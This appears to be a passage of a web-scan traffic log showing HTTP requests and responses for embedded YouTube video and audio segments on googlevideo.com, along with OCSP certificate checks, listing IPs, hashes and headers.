ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
91.90.45.172200 OK 1.2 kB URL HTTP/1.1 rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&sq=0&rn=1&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 91.90.45.172:0
ASN #50304 Blix Solutions AS
File type ASCII text, with very long lines (1204), with no line terminators
Hash e9e169833c53c087a0e6544f9954da15
e4a3b6fb0b9d1c53168db385ce2469f378a69506
e0c93da41f8470a034b2d0bf1d6846da522bd0d71cc3fccffcb2237e48ca6f91
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&sq=0&rn=1&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-capm-vnae.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1204
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Restrict-Formats-Hint: None
X-Content-Type-Options: nosniff
Server: gvs 1.0
rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&range=0-11538&rn=2&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
91.90.45.172200 OK 1.2 kB URL HTTP/1.1 rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&range=0-11538&rn=2&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 91.90.45.172:0
ASN #50304 Blix Solutions AS
File type ASCII text, with very long lines (1172), with no line terminators
Hash 68b53a661bc4431f128d0d7c3643b5ac
473a5c0bf03e67b7b7c84230bed3c50e6a19133f
46d7300629b3314def23d2073084e4f39ce204eb77a028f54f927c6fbc1edf65
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&range=0-11538&rn=2&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-capm-vnae.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1172
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: gvs 1.0
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash c81d42d817c63fd387f875fae88f126a
88fa4a4aa864600dfc025c7077d355d38d2d22b9
81ad3d8e554a0fd4530752e92a769bb4689229fb097bb09076bd85c7d3208fe7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 518633d1dac16539b3661b4a8f6c71df
30916f3e8d20afae54ebb7b8b775e4766861bf0e
cae6bd8337be7692912b529b12d2cabd6b7d5189199921fde4d60f5a836e4400
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 518633d1dac16539b3661b4a8f6c71df
30916f3e8d20afae54ebb7b8b775e4766861bf0e
cae6bd8337be7692912b529b12d2cabd6b7d5189199921fde4d60f5a836e4400
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgJL5b9ea0P7Qr62cOh-zphuqsi1a-93lZfm75ZB4V33UCIQC0tpzBkoh9GjX2ZdHKJOyTA-mrEtl7aBDZn3gg3tIOXA%3D%3D&range=0-11538&rn=4&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.110.134200 OK 1.2 kB URL HTTP/1.1 rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgJL5b9ea0P7Qr62cOh-zphuqsi1a-93lZfm75ZB4V33UCIQC0tpzBkoh9GjX2ZdHKJOyTA-mrEtl7aBDZn3gg3tIOXA%3D%3D&range=0-11538&rn=4&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.110.134:0
File type ASCII text, with very long lines (1175), with no line terminators
Hash a632a88cec3df8a54677b406b5c071d6
749561c9e75eb74ac957b0c724deb1b095e86343
a102530a9f09a23055535a434e176b0c5859d12fd8c4dab5c57572324ea3d6ec
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgJL5b9ea0P7Qr62cOh-zphuqsi1a-93lZfm75ZB4V33UCIQC0tpzBkoh9GjX2ZdHKJOyTA-mrEtl7aBDZn3gg3tIOXA%3D%3D&range=0-11538&rn=4&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-5goeen7y.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1175
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: gvs 1.0
rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgSplxDuIJu5RCe9YYCgo2LVpc9EXFAl4XlXOMUYHeDR4CIBHHq4TFD9K86xo5hByCSHkpK_8ohqiR0RB_C86xBk8y&sq=0&rn=3&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.110.134200 OK 1.2 kB URL HTTP/1.1 rr1---sn-5goeen7y.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgSplxDuIJu5RCe9YYCgo2LVpc9EXFAl4XlXOMUYHeDR4CIBHHq4TFD9K86xo5hByCSHkpK_8ohqiR0RB_C86xBk8y&sq=0&rn=3&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.110.134:0
File type ASCII text, with very long lines (1223), with no line terminators
Hash 51cc13f3d71bfea0cd673782bcc012b9
18d8e3afaf53da56d44b7f3d490edae5d2e8c148
55e1bb6093ed15ce3a136ebbf4bd3fbe618db941d440751de6fbbbb99788605c
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&redirect_counter=1&cm2rm=sn-capm-vnae7e&cms_redirect=yes&cmsv=e&mh=g8&mm=29&mn=sn-5goeen7y&ms=rdu&mt=1663733185&mv=u&mvi=1&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgSplxDuIJu5RCe9YYCgo2LVpc9EXFAl4XlXOMUYHeDR4CIBHHq4TFD9K86xo5hByCSHkpK_8ohqiR0RB_C86xBk8y&sq=0&rn=3&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAl